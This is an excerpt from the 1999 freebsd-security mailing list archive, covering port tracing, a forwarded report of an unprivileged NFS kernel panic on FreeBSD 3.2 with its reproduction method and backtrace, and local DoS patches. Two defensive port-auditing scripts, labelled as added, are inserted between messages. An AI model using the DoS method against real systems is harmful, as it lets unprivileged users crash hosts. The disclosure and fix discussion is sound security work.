> > - Jordan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ---------------------------------- E-Mail: William Woods Date: 03-Sep-99 Time: 22:48:29 This message was sent by XFMail ---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 2:13: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 87D4414F44 for ; Sat, 4 Sep 1999 02:13:02 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id CAA69730; Sat, 4 Sep 1999 02:12:33 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: wwoods@cybcon.com Cc: "Jordan K. Hubbard" , freebsd-security@FreeBSD.ORG, spork Subject: Re: Security Alerts In-reply-to: Your message of "Fri, 03 Sep 1999 23:06:42 PDT." Date: Sat, 04 Sep 1999 02:12:32 -0700 Message-ID: <69726.936436352@localhost> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I don't know C programming very well at all, I am starting a C class > in a week, but is there something I could do to help with this > situation? That's a hard question to answer - it really depends on the exploit. Most don't really require a firm knowledge of C to understand since they come already written and you basically just need to compile and run them. You have to have enough advanced FreeBSD knowledge, however, to distinguish an "exploit" from a DoS to a just-plain-bogus report and only you know whether that's true in your case. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 4:30:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f151.hotmail.com [207.82.251.30]) by hub.freebsd.org (Postfix) with SMTP id 7CED21518B for ; Sat, 4 Sep 1999 04:30:54 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 43008 invoked by uid 0); 4 Sep 1999 11:28:55 -0000 Message-ID: <19990904112855.43007.qmail@hotmail.com> Received: from 195.96.144.201 by www.hotmail.com with HTTP; Sat, 04 Sep 1999 04:28:53 PDT X-Originating-IP: [195.96.144.201] 
From: "N. N.M" To: freebsd-security@freebsd.org Subject: Tracing open ports on FreeBSD Date: Sat, 04 Sep 1999 04:28:53 PDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly listening on my FreeBSD box. I don't know how this has happened, as they were not open before. They are related to X11 as far as I know. But I had already disabled XDM in /etc/ttys file. Could anybody tell me how I can disable this stuff? Or how they could get opened and listening? 2) For some time now, two UDP ports have been open as well. Again, I don't have any idea on how they have got enabled. The ports are 1352 and 2699. Generally, how can I trace when a port suddenly gets enabled? thanks very much, Nazila N. ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 4:43:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id F266D1508E for ; Sat, 4 Sep 1999 04:43:33 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 36624 invoked by uid 1001); 4 Sep 1999 11:41:45 +0000 (GMT) To: madrapour@hotmail.com Cc: freebsd-security@freebsd.org Subject: Re: Tracing open ports on FreeBSD 
From: sthaug@nethelp.no In-Reply-To: Your message of "Sat, 04 Sep 1999 04:28:53 PDT" References: <19990904112855.43007.qmail@hotmail.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 04 Sep 1999 13:41:45 +0200 Message-ID: <36622.936445305@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > listening on my FreeBSD box. I don't know how this has happened, as they > were not open before. They are related to X11 as far as I know. But I had > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > disable this stuff? Or how they could get opened and listening? You're probably using ssh with X11 forwarding. If you use the 'sockstat' program you'll find that sshd is listening to those ports. Disable it by running ssh without X11 forwarding (e.g. 'X11Forwarding no' in the sshd config file). 
Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 6:40:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.skylink.it (ns.skylink.it [194.177.113.1]) by hub.freebsd.org (Postfix) with ESMTP id 7BD6715232 for ; Sat, 4 Sep 1999 06:40:40 -0700 (PDT) (envelope-from hibma@skylink.it) Received: from heidi.plazza.it (va-164.skylink.it [194.185.55.164]) by ns.skylink.it (8.9.1/8.8.8) with ESMTP id PAA18837; Sat, 4 Sep 1999 15:38:19 +0200 Received: from localhost (localhost [127.0.0.1]) by heidi.plazza.it (8.9.3/8.8.5) with ESMTP id LAA56971; Sat, 4 Sep 1999 11:40:27 GMT X-No-Spam: Neither the receipients nor the senders email address(s) are to be used for Unsolicited (Commercial) Email without the explicit written consent of either party; as a per-message fee is incurred for inbound and outbound traffic to the originator. Posted-Date: Sat, 4 Sep 1999 11:40:27 GMT Date: Sat, 4 Sep 1999 13:40:26 +0200 (CEST) 
From: Nick Hibma X-Sender: n_hibma@heidi.plazza.it Reply-To: Nick Hibma To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD In-Reply-To: <19990904112855.43007.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org netstat -na and friends, see man netstat On Sat, 4 Sep 1999, N. N.M wrote: > Hi, > > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > listening on my FreeBSD box. I don't know how this has happened, as they > were not open before. They are related to X11 as far as I know. But I had > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > disable this stuff? Or how they could get opened and listening? > > 2) This is some time that two UDP ports have got opened as well. Again, I > don't have any idea on how they have got enabled. The ports are 1352 and > 2699. Generally, how I can trace when a port gets suddenly enabled? > > thanks very much, > Nazila N. > > ______________________________________________________ > Get Your Private, Free Email at http://www.hotmail.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- e-Mail: hibma@skylink.it To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 7:29:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from drago.cert.org.tw (drago.cert.org.tw [140.117.100.10]) by hub.freebsd.org (Postfix) with ESMTP id B0D3C15267 for ; Sat, 4 Sep 1999 07:29:05 -0700 (PDT) (envelope-from foxfair@drago.cert.org.tw) Received: from foxfair (foxfair@foxfair.cc.nsysu.edu.tw [140.117.100.101]) by drago.cert.org.tw (8.9.3/8.9.3) with SMTP id WAA60547 for ; Sat, 4 Sep 1999 22:26:28 +0800 (CST) Date: Sat, 04 Sep 1999 22:28:24 +0800 
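For the "Tracing open ports" thread above (Nazila's second question, Steinar's sockstat answer and Nick's netstat -na pointer), here is an added example that is not from the thread: it keeps a known-good baseline of listening sockets and diffs a later sockstat -l listing against it, reporting every new listener with its owning process and separating the one benign cause the thread names (sshd X11 forwarding on 6000 + X11DisplayOffset) from listeners that need a closer look. The two sockstat listings, their PIDs and the "unknownd" process are constructed for the demonstration.

```python
import re

# Constructed samples in the layout of FreeBSD `sockstat -l` output (not real
# hosts): the baseline was taken while the box was known-good, the current
# listing afterwards, when the X11-related ports and the unknown UDP port appear.
BASELINE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sshd       117   3  tcp4   *:22                  *:*
root     sendmail   132   4  tcp4   127.0.0.1:25          *:*
root     syslogd    88    4  udp4   *:514                 *:*
"""

CURRENT_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sshd       117   3  tcp4   *:22                  *:*
root     sshd       2041  5  tcp4   *:6010                *:*
root     sshd       2077  5  tcp4   *:6011                *:*
root     sendmail   132   4  tcp4   127.0.0.1:25          *:*
root     syslogd    88    4  udp4   *:514                 *:*
nobody   unknownd   2190  3  udp4   *:2699                *:*
"""

# One sockstat row: USER COMMAND PID FD PROTO LOCAL FOREIGN, whitespace separated.
# The header row does not match because PID and FD must be numeric.
ROW_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$")


def parse_sockstat(text):
    """Map (proto, local address, port) -> (user, command, pid) for every
    listener in a sockstat listing."""
    listeners = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        user, command, pid, _fd, proto, local, _foreign = m.groups()
        addr, port = local.rsplit(":", 1)
        listeners[(proto, addr, int(port))] = (user, command, int(pid))
    return listeners


def classify(proto, addr, port, command):
    """sshd's X11 forwarding listens on TCP 6000 + X11DisplayOffset (10 in
    the thread) and upwards, one port per forwarded session; that is expected.
    Everything else is reported for investigation."""
    if command == "sshd" and proto.startswith("tcp") and 6010 <= port < 6100:
        return "x11-forwarding"
    return "investigate"


def new_listeners(baseline_text, current_text):
    """Listeners present now but absent from the baseline, in listing order,
    each with its owning process and a verdict from classify()."""
    baseline = parse_sockstat(baseline_text)
    findings = []
    for key, (user, command, pid) in parse_sockstat(current_text).items():
        if key in baseline:
            continue
        proto, addr, port = key
        findings.append({"proto": proto, "addr": addr, "port": port,
                         "user": user, "command": command, "pid": pid,
                         "verdict": classify(proto, addr, port, command)})
    return findings


def gone_listeners(baseline_text, current_text):
    """Listeners the baseline had that have disappeared; a daemon that died
    or was replaced is worth noticing as well."""
    current = parse_sockstat(current_text)
    return sorted(k for k in parse_sockstat(baseline_text) if k not in current)


if __name__ == "__main__":
    for f in new_listeners(BASELINE_SOCKSTAT, CURRENT_SOCKSTAT):
        print("NEW  %(proto)s %(addr)s:%(port)d %(command)s[%(pid)d] "
              "as %(user)s -> %(verdict)s" % f)
    for proto, addr, port in gone_listeners(BASELINE_SOCKSTAT, CURRENT_SOCKSTAT):
        print("GONE %s %s:%d" % (proto, addr, port))
```

Run from cron against a saved baseline this turns "how can I trace when a port suddenly gets enabled" into a diff that names the process, which is the part the thread's one-off netstat -na check does not give you.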
From: Foxfair Hu To: security@FreeBSD.org Subject: Fw: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ] Message-Id: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA==" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver 1.25.04 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA== Content-Transfer-Encoding: 7bit Content-Type: text/plain Forwarded by Foxfair Hu ---------------- Original message follows ---------------- 
From: Sebastien Petit To: BUGTRAQ@SECURITYFOCUS.COM Date: Thu, 2 Sep 1999 16:53:03 +0200 Subject: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ] -- Hi ! There is a problem with FreeBSD 3.2-RELEASE and -STABLE and perhaps FreeBSD 3.x. The system panics when a program performs multiple accesses on an nfs v3 mounted directory with default mount options (ie: mount x.x.x.x:/nfs /usr2). FreeBSD 3.2 crashes immediately with no warnings and just a "panic: getnewbuf: cannot get buffer, infinite recursion failure", without root privileges. This is simple to reproduce with a program that creates a lot of processes (ie: 120) accessing the nfs mounted directory and just does "open", "seek", "write", "close". NetBSD is not vulnerable. gdb:
panic: getnewbuf: cannot get buffer, infinite recursion failure
syncing disks... panic: getnewbuf: cannot get buffer, infinite recursion failure
dumping to dev 20001, offset 272816
dump 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110 109 108 107 106 105 104 103 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
---
#0 boot (howto=260) at ../../kern/kern_shutdown.c:285
285 dumppcb.pcb_cr3 = rcr3();
(kgdb) where
#0 boot (howto=260) at ../../kern/kern_shutdown.c:285
#1 0xc012f87c in at_shutdown ( function=0xc02075f1 <__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>, arg=0x200, queue=1174437888) at ../../kern/kern_shutdown.c:446
#2 0xc014dc9f in getnewbuf (vp=0xcc1edb40, blkno=2293824, slpflag=0, slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074
#3 0xc014e58c in getblk (vp=0xcc1edb40, blkno=2293824, size=8192, slpflag=0, slptimeo=0) at ../../kern/vfs_bio.c:1511
#4 0xc014cd85 in bread (vp=0xcc1edb40, blkno=2293824, size=8192, cred=0x0, bpp=0xcc3acbec) at ../../kern/vfs_bio.c:282
#5 0xc01b60f8 in ffs_update (vp=0xcc21ea40, waitfor=0) at ../../ufs/ffs/ffs_inode.c:98
#6 0xc01ba92f in ffs_fsync (ap=0xcc3acc74) at ../../ufs/ffs/ffs_vnops.c:258
#7 0xc01b8cb7 in ffs_sync (mp=0xc1d01c00, waitfor=2, cred=0xc0756300, p=0xc0246624) at vnode_if.h:499
#8 0xc0155f37 in sync (p=0xc0246624, uap=0x0) at ../../kern/vfs_syscalls.c:549
#9 0xc012f43d in boot (howto=256) at ../../kern/kern_shutdown.c:203
#10 0xc012f87c in at_shutdown ( function=0xc02075f1 <__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>, arg=0x2000, queue=12443648) at ../../kern/kern_shutdown.c:446
#11 0xc014dc9f in getnewbuf (vp=0xcc243280, blkno=1519, slpflag=0, slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074
#12 0xc014e58c in getblk (vp=0xcc243280, blkno=1519, size=8192, slpflag=0, slptimeo=0) at ../../kern/vfs_bio.c:1511
#13 0xc017b9fa in nfs_getcacheblk (vp=0xcc243280, bn=1519, size=8192, p=0xcc36f700) at ../../nfs/nfs_bio.c:904
#14 0xc017b5a5 in nfs_write (ap=0xcc3acec8) at ../../nfs/nfs_bio.c:765
#15 0xc0159dea in vn_write (fp=0xc1d40d40, uio=0xcc3acf10, cred=0xc1d36300, flags=0) at vnode_if.h:331
#16 0xc013a73a in dofilewrite (p=0xcc36f700, fp=0xc1d40d40, fd=3, buf=0x804b000, nbyte=102400, offset=-1, flags=0) at ../../kern/sys_generic.c:363
#17 0xc013a643 in write (p=0xcc36f700, uap=0xcc3acf94) at ../../kern/sys_generic.c:298
#18 0xc01e6edb in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 0, tf_esi = 12384951, tf_ebp = -1077945584, tf_isp = -868560924, tf_ebx = 12384951, tf_edx = 0, tf_ecx = 12384951, tf_eax = 4, tf_trapno = 7, tf_err = 2, tf_eip = 671700396, tf_cs = 31, tf_eflags = 582, tf_esp = -1077946192, tf_ss = 39}) at ../../i386/i386/trap.c:1100
#19 0xc01dda5c in Xint0x80_syscall ()
#20 0x8048799 in ?? ()
Exploit nfsexp.c is attached to this message. Spe & Gro. 
--- spe@oleane.net gro@oleane.net
Content-Type: application/octet-stream; name="nfsbench.c" Content-Disposition: attachment; filename="nfsbench.c" Content-Transfer-Encoding: base64
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 8:19:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 483AC14EF1 for ; Sat, 4 Sep 1999 08:19:01 -0700 (PDT) (envelope-from phantom@scorpion.crimea.ua)
Received: (from uucp@localhost) by sonet.crimea.ua (8.8.8/8.8.8) with UUCP id QAA20796; Sat, 4 Sep 1999 16:56:03 +0400 (MSD) (envelope-from phantom@scorpion.crimea.ua) Received: (from phantom@localhost) by scorpion.crimea.ua (8.8.8/8.8.5+ssl+keepalive) id PAA02815; Sat, 4 Sep 1999 15:00:06 +0400 (MSD) Date: Sat, 4 Sep 1999 15:00:06 +0400 
From: Alexey Zelkin To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD Message-ID: <19990904150006.A2526@scorpion.crimea.ua> References: <19990904112855.43007.qmail@hotmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: <19990904112855.43007.qmail@hotmail.com> X-Operating-System: FreeBSD 2.2.7-RELEASE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, On Sat, Sep 04, 1999 at 04:28:53AM -0700, N. N.M wrote: > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > listening on my FreeBSD box. I don't know how this has happened, as they > were not open before. They are related to X11 as far as I know. But I had > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > disable this stuff? Or how they could get opened and listening? > > 2) This is some time that two UDP ports have got opened as well. Again, I > don't have any idea on how they have got enabled. The ports are 1352 and > 2699. Generally, how I can trace when a port gets suddenly enabled? I can propose an idea of how to understand which process used this port.
for example -- how to find the process which opened port 80 (aka http)
$ netstat -Ana | grep \*\.80
f0625d00 tcp 0 0 *.80 *.* LISTEN
$ fstat | grep f00625d00
nobody httpd 200 15* internet stream tcp f00625d00
first field is process owner, second - name of process, third - pid -- /* Alexey Zelkin && phantom@cris.net */ /* Tavrical National University && phantom@crimea.edu */ /* http://www.ccssu.crimea.ua/~phantom && phantom@FreeBSD.org */ From owner-freebsd-security Sat Sep 4 10: 2:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [216.126.82.226]) by hub.freebsd.org (Postfix) with ESMTP id D50FD15135 for ; Sat, 4 Sep 1999 10:02:17 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.9.3/8.9.3) id NAA45902; Sat, 4 Sep 1999 13:02:11 -0400 (EDT) (envelope-from dgilbert)
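Alexey's two-step lookup (netstat -A for the PCB address, then fstat to find the process holding that PCB) scripted as an added example; this is not code from the post. The netstat and fstat outputs below are constructed samples in the column layout the post shows, so the script runs offline; on a FreeBSD host they would come from the live `netstat -Ana` and `fstat` commands.

```shell
#!/bin/sh
# Added example: join `netstat -Ana` output to `fstat` output on the kernel
# PCB address to learn which process owns a listening port.

# Constructed sample of `netstat -Ana` (first column is the PCB address,
# local address is written addr.port, so the port is the last dotted field).
NETSTAT_SAMPLE='Active Internet connections (including servers)
PCB      Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
f0625d00 tcp        0      0  *.80                   *.*                    LISTEN
f0626a00 tcp        0      0  *.22                   *.*                    LISTEN
f0627b00 tcp        0      0  127.0.0.1.6010         *.*                    LISTEN
f0628c00 udp        0      0  *.1352                 *.*'

# Constructed sample of `fstat` (owner, command, pid, fd, then the socket
# description, which ends with the same PCB address netstat printed).
FSTAT_SAMPLE='USER     CMD          PID   FD MOUNT      INUM MODE         SZ|DV R/W
nobody   httpd        200   15* internet stream tcp f0625d00
root     sshd         312    3* internet stream tcp f0626a00
user1    sshd         450    8* internet stream tcp f0627b00
root     natd         120    4* internet dgram udp f0628c00'

# pcb_for_port PORT [PROTO]: print the PCB address of the socket bound to the
# given local port on any local address; PROTO defaults to tcp.
pcb_for_port() {
    printf '%s\n' "$NETSTAT_SAMPLE" | awk -v port="$1" -v proto="${2:-tcp}" '
        $2 == proto {
            n = split($5, a, ".")      # "*.80" or "127.0.0.1.6010": port is last
            if (a[n] == port) { print $1; exit }
        }'
}

# owner_of_pcb PCB: print "owner command pid" for the process that holds PCB.
owner_of_pcb() {
    printf '%s\n' "$FSTAT_SAMPLE" | awk -v pcb="$1" '
        $NF == pcb { print $1, $2, $3; exit }'
}

# port_owner PORT [PROTO]: the whole lookup in one call; fails with a message
# on stderr when nothing is bound to that port.
port_owner() {
    pcb=$(pcb_for_port "$1" "${2:-tcp}")
    [ -n "$pcb" ] || { echo "no ${2:-tcp} socket bound to port $1" >&2; return 1; }
    owner_of_pcb "$pcb"
}

# Stand-alone use: `sh find_owner.sh 80` or `sh find_owner.sh 1352 udp`.
if [ "$#" -gt 0 ]; then
    port_owner "$@"
fi
```

The sshd entry on 127.0.0.1.6010 is the pattern David Gilbert describes in his reply: one listener per X-forwarded ssh session, so port 6010 maps to an sshd process rather than to an X server.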
From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14289.20627.316196.336184@trooper.velocet.ca> Date: Sat, 4 Sep 1999 13:02:11 -0400 (EDT) To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Tracing open ports on FreeBSD In-Reply-To: <19990904112855.43007.qmail@hotmail.com> References: <19990904112855.43007.qmail@hotmail.com> X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "N" == N N M writes: N> Hi, 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are N> openly listening on my FreeBSD box. I don't know how this has N> happened, as they were not open before. They are related to X11 as N> far as I know. But I had already disabled XDM in /etc/ttys N> file. Could anybody tell me how I can disable this stuff? Or how N> they could get opened and listening? Generally, these are ssh. When you ssh into a machine and have X forwarding on, these ports are open --- one port for each ssh connection. N> 2) This is some time that two UDP ports have got opened as N> well. Again, I don't have any idea on how they have got N> enabled. The ports are 1352 and 2699. Generally, how I can trace N> when a port gets suddenly enabled? try lsof -i:1352 .... Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. 
| =========================================================GLO================ From owner-freebsd-security Sat Sep 4 13: 1:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.palmerharvey.co.uk (mail.palmerharvey.co.uk [62.172.109.58]) by hub.freebsd.org (Postfix) with ESMTP id 17B6514EED for ; Sat, 4 Sep 1999 13:01:39 -0700 (PDT) (envelope-from Dom.Mitchell@palmerharvey.co.uk) Received: from ho-nt-01.pandhm.co.uk (unverified) by mail.palmerharvey.co.uk (Content Technologies SMTPRS 4.0.1) with ESMTP id ; Sat, 4 Sep 1999 20:59:38 +0100 Received: from voodoo.pandhm.co.uk (VOODOO [10.100.35.12]) by ho-nt-01.pandhm.co.uk with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0) id RWF23YZQ; Sat, 4 Sep 1999 20:59:07 +0100 Received: from dom by voodoo.pandhm.co.uk with local (Exim 2.10 #1) id 11NLyp-000JBR-00; Sat, 4 Sep 1999 21:00:07 +0100 Date: Sat, 4 Sep 1999 21:00:07 +0100 To: Alexey Zelkin Cc: "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD Message-ID: <19990904210006.A73676@voodoo.pandhm.co.uk> References: <19990904112855.43007.qmail@hotmail.com> <19990904150006.A2526@scorpion.crimea.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <19990904150006.A2526@scorpion.crimea.ua>; from Alexey Zelkin on Sat, Sep 04, 1999 at 03:00:06PM +0400
From: Dominic Mitchell Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 04, 1999 at 03:00:06PM +0400, Alexey Zelkin wrote: > On Sat, Sep 04, 1999 at 04:28:53AM -0700, N. N.M wrote: > > > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > > listening on my FreeBSD box. I don't know how this has happened, as they > > were not open before. They are related to X11 as far as I know. But I had > > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > > disable this stuff? Or how they could get opened and listening? Most likely an ssh connection... ssh has numbered X servers. > > 2) This is some time that two UDP ports have got opened as well. Again, I > > don't have any idea on how they have got enabled. The ports are 1352 and > > 2699. Generally, how I can trace when a port gets suddenly enabled? > > I can propose idea how to understand which process used this port. > > for example -- how to find process which opened port 80 (aka http) If you're running a fairly recent FreeBSD (it was in 3.2), the sockstat utility will do this for you. -- Dom Mitchell -- Palmer & Harvey McLane -- Unix Systems Administrator "Ordinary folks who don't understand computers don't deserve to be mocked. Ordinary people who want to use their computers but refuse to learn anything about them do." -- slashdot comment
From owner-freebsd-security Sat Sep 4 16:55: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id F1F4515232 for ; Sat, 4 Sep 1999 16:55:01 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id TAA77857 for ; Sat, 4 Sep 1999 19:54:54 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sat, 4 Sep 1999 19:54:54 -0400 (EDT)
From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: security@FreeBSD.org Subject: another local DoS fix (PR ???) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I can't find the PR for it again (it was from will@iki.fi, supposedly) for the problem, but this is something I have been working on. crashopen.c and crashwrite.c had the ability to DoS a system easily. I fixed crashopen.c with the addition of badfileops. Crashwrite.c and other problems that could crop up like it are fixed by my patch up at http://www.FreeBSD.org/~green/fdfix2.patch Let me know how useful you find them. I'd like to get my diffs in 4.0 soon, since I've been running with them with no problems for months, and they make FreeBSD more robust. Let me know what you think, even if you don't try them, please :) -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / From owner-freebsd-security Sat Sep 4 17: 8:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 0944414DFF for ; Sat, 4 Sep 1999 17:08:23 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id UAA78039; Sat, 4 Sep 1999 20:07:17 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sat, 4 Sep 1999 20:07:17 -0400 (EDT)
From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Mike Tancsa Cc: Garrett Wollman , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <4.1.19990901191051.04e80570@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Mike Tancsa wrote: > >We have known for some time that the problem originally described > >exists, but developing an acceptable solution has been a challenge. > >Now that sockets carry around user credentials, it may perhaps not be > >as difficult as it used to be. > > > >What needs to be done is to impose a per-UID resource limit on the > >amount of socket buffer space available. > > > Do you think these changes would be incorporated into the 3.x branch, or > strictly 4.x ? Both. The basis necessary (so_cred) is in both, but I need to change it to a ucred (it really should be a ucred, not a pcred.) That change is one of the changes I've made in my diffs I posted an address to. > > ---Mike > ********************************************************************** > Mike Tancsa, Network Admin * mike@sentex.net > Sentex Communications Corp, * http://www.sentex.net/mike > Cambridge, Ontario * 01.519.651.3400 > Canada * > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! 
\ -- Rich Kulawiec / From owner-freebsd-security Sat Sep 4 17:10: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 12C1E14DFF for ; Sat, 4 Sep 1999 17:10:02 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id UAA78019; Sat, 4 Sep 1999 20:05:28 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sat, 4 Sep 1999 20:05:27 -0400 (EDT)
